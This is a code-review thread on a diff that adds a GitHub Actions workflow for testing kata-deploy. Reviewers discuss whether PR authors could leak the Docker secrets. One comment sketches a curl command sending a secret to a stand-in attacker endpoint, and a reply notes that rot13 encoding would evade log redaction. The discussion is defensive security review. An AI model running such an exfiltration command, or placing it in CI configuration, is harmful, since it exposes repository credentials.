.github/workflows/kata-deploy-test.yaml

```diff
@@ -0,0 +1,54 @@
+on: issue_comment
+name: test-kata-deploy
+jobs:
+  check_comments:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Check for Command
+        id: command
+        uses: xt0rted/slash-command-action@v1
+        with:
+          repo-token: ${{ secrets.GITHUB_TOKEN }}
+          command: "test"
+          reaction: "true"
+          reaction-type: "eyes"
+          allow-edits: "false"
+          permission-level: admin
+      - name: verify command arg is kata-deploy
+        run: |
+           echo "The command was '${{ steps.command.outputs.command-name }}' with arguments '${{ steps.command.outputs.command-arguments }}'"
+           [[ ${{ steps.command.outputs.command-arguments}} == "kata-deploy" ]]
+  create-and-test-container:
+    needs: check_comments
+    runs-on: ubuntu-latest
+    steps:
+      - name: get-PR-ref
+        id: get-PR-ref
+        run: |
+            ref=$(cat $GITHUB_EVENT_PATH | jq -r '.issue.pull_request.url' | sed  's#^.*\/pulls#refs\/pull#' | sed 's#$#\/merge#')
+            echo "reference for PR: " ${ref}
+            echo "##[set-output name=pr-ref;]${ref}"
+      - uses: actions/checkout@v2-beta
+        with:
+          ref: ${{ steps.get-PR-ref.outputs.pr-ref }}
+      - name: build-container-image
+        id: build-container-image
+        run: |
+            PR_SHA=$(git log --format=format:%H -n1)
+            VERSION=$(curl https://raw.githubusercontent.com/kata-containers/runtime/master/VERSION)
+            ARTIFACT_URL="https://github.com/kata-containers/runtime/releases/download/${VERSION}/kata-static-${VERSION}-x86_64.tar.xz"
+            wget "${ARTIFACT_URL}" -O ./kata-deploy/kata-static.tar.xz
+            docker build --build-arg KATA_ARTIFACTS=kata-static.tar.xz -t katadocker/kata-deploy-ci:${PR_SHA} ./kata-deploy
+            docker login -u ${{ secrets.DOCKER_USERNAME }} -p ${{ secrets.DOCKER_PASSWORD }}
```

Comment:
This uses secretes and it is triggered via `issue_comment`, If someone send a PR modifying this yaml and does something like `curl  --headers secrets.DOCKER_USERNAME mywebsite/store/data/endpoint` this or other secretes like AZ may be in danger or it will not execute the new pipeline modifications until merged, if is until merged may be more safe but prompt to errors as the test will not be tested until merged. 

In anycase somethings to have in mind are:
 - katadocker/kata-deploy-ci credentials only should have access to it and nothing more, so if the secrete is compromised only a non production part will have problems.  ( I do something similar for azure pipelines) 
- It would be great confirm that github ensure that only members of Kata can trigger the job. Because yaml modification + trigger could lead to something want, having limited accounts still will helps but would be better to see if this is the case.

Reply:
Secrets aren't printable here. GHA scrubs these (ie, even if you assign to variable and echo this, it'll just be ***). This has been tested, and is a critical part of GH Actions.

Only admins in the repository can trigger the job (this has been tested).

Reply:
Following up, the redaction is based on a string match, so if a terrible horrible person were to echo secrets on the logs using something like rot13, it will be printed.

Even worse than that terrible horrible person would be if a Kata admin were to merge that said change into the codebase and/or to approve and test said changes in the PR.

So, we'll need to rely on humans, here.

Reply:
Great, as side note actions will execute only the code that is merged not the one from a PR